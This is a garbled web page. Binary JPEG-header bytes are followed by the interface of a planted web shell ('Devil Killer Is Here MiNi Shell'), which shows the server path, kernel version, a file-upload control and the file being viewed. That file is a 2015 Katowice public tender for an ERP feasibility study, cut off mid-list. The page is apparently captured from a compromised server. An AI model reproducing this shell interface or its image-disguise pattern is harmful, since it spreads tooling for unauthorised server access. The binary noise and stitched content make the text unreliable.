JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150302/44908-N-2015.html

<p class="kh_header"><b>Katowice: Opracowanie Studium Wykonalności projektu Centrum Usług Wspólnych</b><br>
<b>Numer ogłoszenia: 44908 - 2015; data zamieszczenia: 02.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Katowice , ul. Młyńska 4, 40-098 Katowice, woj. śląskie, tel. 32 2593302, faks 32 2593303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Studium Wykonalności projektu Centrum Usług Wspólnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie Studium Wykonalności projektu Centrum Usług Wspólnych

a)     Etap I - przeprowadzenie analizy i oceny opracowanej Koncepcji wdrożenia systemu ERP w Urzędzie Miasta Katowice i jednostkach organizacyjnych Miasta Katowice zwanej dalej Koncepcją stanowiącej Zał.  nr 9 do SIWZ wraz z wprowadzeniem do niej niezbędnych zmian

b)     Etap II - opracowanie Studium Wykonalności projektu Centrum Usług Wspólnych zwanego dalej projektem na podstawie Koncepcji wraz z Aneksem do Koncepcji opracowanym przez Wykonawcę w ramach realizacji etapu I.

1)     W ramach zamówienia wykonawca zobowiązany jest do:

A.     Dla etapu I:

a)     Przeprowadzenie analizy Koncepcji pod kątem oceny poziomu szczegółowości definicji potrzeb i rozwiązań, stopnia pokrycia wszystkich elementów wymaganych przez dobre praktyki dla przygotowania projektu wdrożenia systemu informatycznego, oceny zakresu ujęcia oraz poziomu opisu i mierzalności celów stawianych przez sponsorów i głównych użytkowników systemu;

b)     Przeprowadzenie przeglądu zakresu i poziomu szczegółowości koncepcji pod kątem możliwości jego wykorzystania jako podstawy do opracowania Studium Wykonalności projektu;

c)      Omówienie w trakcie (maksymalnie 5) spotkań  z przedstawicielami miasta Katowice listy obszarów objętych wdrożeniem oraz identyfikacja priorytetów biznesowych odnośnie kolejności włączania kolejnych procesów do nowego systemu ERP, który ma zostać wdrożony w ramach projektu, w szczególności ustalenie priorytetów dla wdrożenia pilotażowego tak, aby objęło obszary najpilniej wymagające zmian oraz najważniejsze z perspektywy interesów miasta Katowice przy zachowaniu akceptowalnego poziomu ryzyka biznesowego pilotażu; przykładowe kryteria:

 i.   Priorytety Miasta określone w priorytecie inwestycyjnym 2.3 - wzmacnianie zastosowania technologii informacyjno - komunikacyjnych dla e-administracji

 ii.   Planowane centralizacje organizacyjne i procesowe wymagające standaryzacji systemów informatycznych

 iii.   Uzależnienie realizacji zdefiniowanych celów biznesowych miasta Katowice od wsparcia wybranych obszarów planowanym systemem informatycznym

 iv.   Użytkowanie niewspieranych, nieefektywnych systemów informatycznych wymagających pilnej wymiany

d)     Przeprowadzenie z wybranymi sponsorami i użytkownikami systemu (maksymalnie 10) wywiadów odnośnie ich celów i oczekiwań, aktualnych problemów i wyzwań operacyjnych w codziennym funkcjonowaniu, w tym związanych z narzędziami informatycznymi; ocena ujęcia tych kwestii w przygotowanej Koncepcji oraz wskazanie i udokumentowanie możliwości dodatkowych usprawnień

e)     Przeprowadzenie oceny przyjętych w Koncepcji założeń oraz uzyskanych wyników dla szacowanych kosztów i korzyści, w tym w szczególności uwzględnionych pozycji kosztowych wdrożenia systemu informatycznego

f)      Opracowanie raportu podsumowującego przeprowadzone analizy, ich wyniki i wnioski, wskazanie zidentyfikowanych ryzyk i ewentualnych luk, które zostaną usunięte aneksem do Koncepcji, o którym mowa w lit. g. Raport powinien zostać przekazany Zamawiającemu w postaci plików w formatach DOCX oraz PDF.

g)     Opracowanie Aneksu do Koncepcji uwzględniającego kwestie przedstawione w raporcie, o którym mowa w lit.f). Aneks do Koncepcji powinien zostać przekazany Zamawiającemu w postaci plików w formatach DOCX oraz PDF.

h)     Przeprowadzenie prezentacji raportu podsumowującego przeprowadzone analizy, o którym mowa w lit. f) oraz Aneksu do Koncepcji, o którym mowa w lit. g). Prezentacja raportu podsumowującego powinna zostać przekazana Zamawiającemu w postaci plików w formatach PPTX oraz PDF.

B. Dla etapu II: Opracowanie Studium Wykonalności zgodnie z wytycznymi określającymi wymagania dla studiów wykonalności projektów dla osi priorytetowej II Cyfrowe Śląskie w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 dla przedsięwzięć z zakresu wsparcia rozwoju oraz zwiększenia dostępu obywateli i przedsiębiorców do cyfrowych usług publicznych, które zostaną opublikowane przez Instytucję Zarzadzającą przed ogłoszeniem konkursu projektów; Studium Wykonalności będzie podstawą do sporządzenia wniosku o dofinansowanie projektu. Studium Wykonalności powinno zostać przekazane Zamawiającemu w postaci plików w formatach DOCX oraz PDF, a załączniki do Studium Wykonalności zawierające tabele finansowe - w formacie XLSX.

2)     Pozostałe warunki dotyczące realizacji zamówienia zostały określone w projekcie umowy. (Zał.  nr 8 do SIWZ)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.10.00-9, 72.22.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)     Wykonawca powinien zgodnie z art. 45 ust. 3 ustawy przed upływem terminu składania ofert wnieść wadium przetargowe w wysokości 10.000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie, ponieważ przepisy prawa nie nakładają obowiązku posiadania uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)    W okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych - wykonują usługi w zakresie:

a)     opracowywania założeń do systemów informatycznych realizujących zadania w zakresie klasycznych systemów klasy ERP, systemów podatkowych, systemów elektronicznego zarządzania dokumentami, systemów menadżerskich typu BI dla dużych organizacji budżetowych wielopodmiotowych składających się z przynajmniej z 10 różnych podmiotów prowadzących własną wydzieloną księgowość - przynajmniej 1 opracowanie   wraz z załączeniem dowodów, że usługi te zostały wykonane należycie

b)     opracowania założeń do systemu finansowego miasta na prawach powiatu - przynajmniej 1 opracowanie wraz z załączeniem dowodów, że usługi te zostały wykonane należycie;

c)      opiniowania założeń biznesowych dla systemu klasy ERP dla dużych organizacji budżetowych wielopodmiotowych składających się z przynajmniej z 10 różnych podmiotów prowadzących własną wydzieloną księgowość - przynajmniej 1 opracowanie wraz z załączeniem dowodów, że usługi te zostały wykonane należycie;

d)     sporządzenia Studium Wykonalności dla projektu o budżecie min. 5 mln zł brutto w zakresie społeczeństwa informacyjnego - przynajmniej 1 opracowanie  wraz z załączeniem dowodów, że usługi te zostały wykonane należycie.

Zamawiający uzna ww. warunki za spełnione również wtedy, jeśli Wykonawca wykonał 1 opracowanie obejmujące swym zakresem zakresy opisane w lit. a i b.

Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w części III.4 oraz będzie zgodny z formułą  SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)     dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości tj.:

a)     kierownik projektu - osoba z wykształceniem co najmniej wyższym magisterskim legitymująca się certyfikatem Prince 2 Practitioner lub równoważnym certyfikatem potwierdzającym umiejętność prowadzenia projektu,

b)     analityk biznesowy - osoba z wykształceniem ekonomicznym co najmniej wyższym magisterskim legitymująca się wykonaniem co najmniej 2 koncepcji wdrożenia systemu klasy ERP,

c)      ekspert ds. procesów - osoba ze znajomością specyfiki funkcjonowania rozwiązań dla urzędów miejskich legitymująca się wykonaniem co najmniej 2 koncepcji wdrożenia systemu klasy ERP dla miast na prawach powiatu,

d)     ekspert ds. systemów dla obsługi podatków - osoba z doświadczeniem praktycznym w projektowaniu i wdrażaniu rozwiązań dla obsługi podatków miejskich i /lub krajowych z udokumentowanym udziałem w przygotowaniu systemów dla obsługi podatków dla przynajmniej dwóch organizacji,

e)     architekt systemów informatycznych - osoba z wykształceniem informatycznym co najmniej wyższym magisterskim legitymująca się opracowaniem architektury systemu (platforma sprzętowa, platforma systemowa i bazodanowa, aplikacje i usługi oraz dane) dla co najmniej 2 systemów klasy ERP,

f)      konsultant ds. bezpieczeństwa - osoba z wykształceniem co najmniej wyższym magisterskim legitymująca się certyfikatem SABSA - Chartered Security Architect, lub Certified Information Systems Security Professional - CISSP lub równoważnym certyfikatem potwierdzającym kompetencje w ocenie bezpieczeństwa rozwiązań informatycznych i legitymująca się wykonaniem co najmniej 2 założeń dla nowo wdrażanych rozwiązań technologicznych pod względem bezpieczeństwa przeznaczonych do użytku przez co najmniej 1000 użytkowników;

g)     ekspert ds. studiów wykonalności - osoba, która posiada doświadczenie w przygotowywaniu studiów wykonalności projektów współfinansowanych ze środków zagranicznych w zakresie społeczeństwa informacyjnego tj. kierowała i nadzorowała przygotowanie co najmniej 2 studiów wykonalności takich projektów o wartości min. 1 mln zł. Na dołączonym do oferty wykazie osób w pozycji Zawód, Specjalność wykształcenie, doświadczenie należy podać nazwy projektów oraz nazwy programów, w ramach których projekty były współfinansowane ze środków zagranicznych.

Wykonawca może dysponować osobami łączącymi ww. wymagania z tym, że funkcja kierownika projektu nie może być łączona z żadną z innych wymienionych funkcji.

Sposób oceny spełniania warunków wymaganych od wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w części III.4 oraz będzie zgodny z formułą  SPEŁNIA / NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług (lub dostaw) w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający doświadczenie wykonawcy wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie w zakresie minimum:

i.  opracowywania założeń do systemów informatycznych realizujących zadania w zakresie klasycznych systemów klasy ERP, systemów podatkowych, systemów elektronicznego zarządzania dokumentami, systemów menadżerskich typu BI dla dużych organizacji budżetowych wielopodmiotowych składających się z przynajmniej z 10 różnych podmiotów prowadzących własną wydzieloną księgowość - przynajmniej 1 opracowanie wraz z potwierdzeniem zamawiającego, że założenia systemu zostały przyjęte do realizacji systemu;

ii.  opracowania założeń do systemu finansowego miasta na prawach powiatu - przynajmniej 1 opracowanie wraz z potwierdzeniem zamawiającego, że założenia systemu zostały przyjęte do realizacji systemu;

iii.  opiniowania założeń biznesowych dla systemu klasy ERP dla dużych organizacji budżetowych wielopodmiotowych składających się z przynajmniej z 10 różnych podmiotów prowadzących własną wydzieloną księgowość - przynajmniej 1 opracowanie wraz z potwierdzeniem zamawiającego, że zamówienie zostało wykonane zgodnie z umową;

iv. przygotowania Studium Wykonalności projektów w zakresie społeczeństwa informacyjnego - przynajmniej 1 opracowanie na podstawie którego przyjęto do realizacji projekt o budżecie min. 5 mln zł brutto.

Zamawiający uzna ww. warunki za spełnione również wtedy, jeśli Wykonawca wykonał 1 opracowanie obejmujące swym zakresem zakresy opisane w lit. i oraz ii.

Uwaga 1 - Dowodami, o których mowa wyżej, są:

i.   poświadczenie z tym, że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,

ii.  oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w punkcie i,

iii.    W przypadku, gdy zamawiający jest podmiotem, na rzecz którego dostawy lub usługi wskazane w wykazie, o którym mowa wyżej, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania ww. dowodów.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)     Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym załącznik do specyfikacji wraz z oświadczeniem o spełnianiu warunków udziału w postępowaniu

2)     Wykonawca zobowiązany jest załączyć do swojej oferty: kalkulację ceny ofertowej

3)     Dowód wniesienia wadium

Oferty wspólne:

1)     W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii. 

2)     Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.

3)     W przypadku gdy wykonawcą wspólnie ubiegającym się o zamówienie jest konsorcjum w celu wykazania braku podstaw do wykluczenia takiego wykonawcy z postępowania dokumenty wymienione w pkt III.4.2 należy przedstawić  dla każdego z partnerów konsorcjum osobno.

4)     W przypadku gdy wykonawcą wspólnie ubiegającym się o zamówienie jest spółka cywilna, w celu wykazania braku podstaw do wykluczenia takiego wykonawcy z postępowania dokumenty wymienione w pkt III.4.2 należy przedstawić  dla każdego ze wspólników spółki osobno, z tym że:

- zaświadczenie właściwego naczelnika urzędu skarbowego należy przedstawić osobno dla spółki w zakresie podatku VAT i osobno dla wspólników w zakresie podatku dochodowego,

- zaświadczenie właściwego oddziału ZUS lub KRUS należy przedstawić osobno dla wspólników spółki oraz w przypadku, gdy spółka cywilna zobowiązana jest do odprowadzania składki ZUS - również dla spółki.

5)     W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaz usług o którym mowa w pkt III.4.1 składają w/w wykonawcy wspólnie.

6)    Dokumenty dotyczące przynależności do tej samej grupy kapitałowej określone w punkcie III.4.4 wraz z ofertą winien przedłożyć każdy z wykonawców wspólnie ubiegających się o zamówienie.

7)    W przypadku polegania na zasobach innych podmiotów - pisemne zobowiązanie tych podmiotów, że oddane zostaną do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia - zgodnie z wzorem załączonym do SIWZ oraz dokumenty, o których mowa w poniższym punkcie.

8)   Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów wymaga załączenia do oferty dokumentów dotyczących w szczególności:
-       zakresu dostępnych wykonawcy zasobów innego podmiotu;
-      sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę przy wykonaniu zamówienia;
-       charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem;
-       zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
9)    Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności,  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

10)  Podmiot, który zobowiązał się do udostępnienia zasobów (o którym mowa w punkcie III.3.4) odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.

11)     Treść zobowiązania podmiotu trzeciego powinna określać:

a)     kto jest podmiotem przyjmującym zasoby (nazwa i adres wykonawcy składającego ofertę),

b)     kto jest podmiotem oddającym zasoby (nazwa i adres podmiotu oddającego do dyspozycji zasoby),

c)      nazwa zamówienia publicznego, przy realizacji którego zasoby będą udostępniane,

d)     zakres udostępnianych zasobów:
- wiedza i doświadczenie w zakresie potwierdzenia spełniania warunku,- osoby zdolne do wykonania zamówienia (imię i nazwisko, funkcja lub zakres wykonywanych czynności),

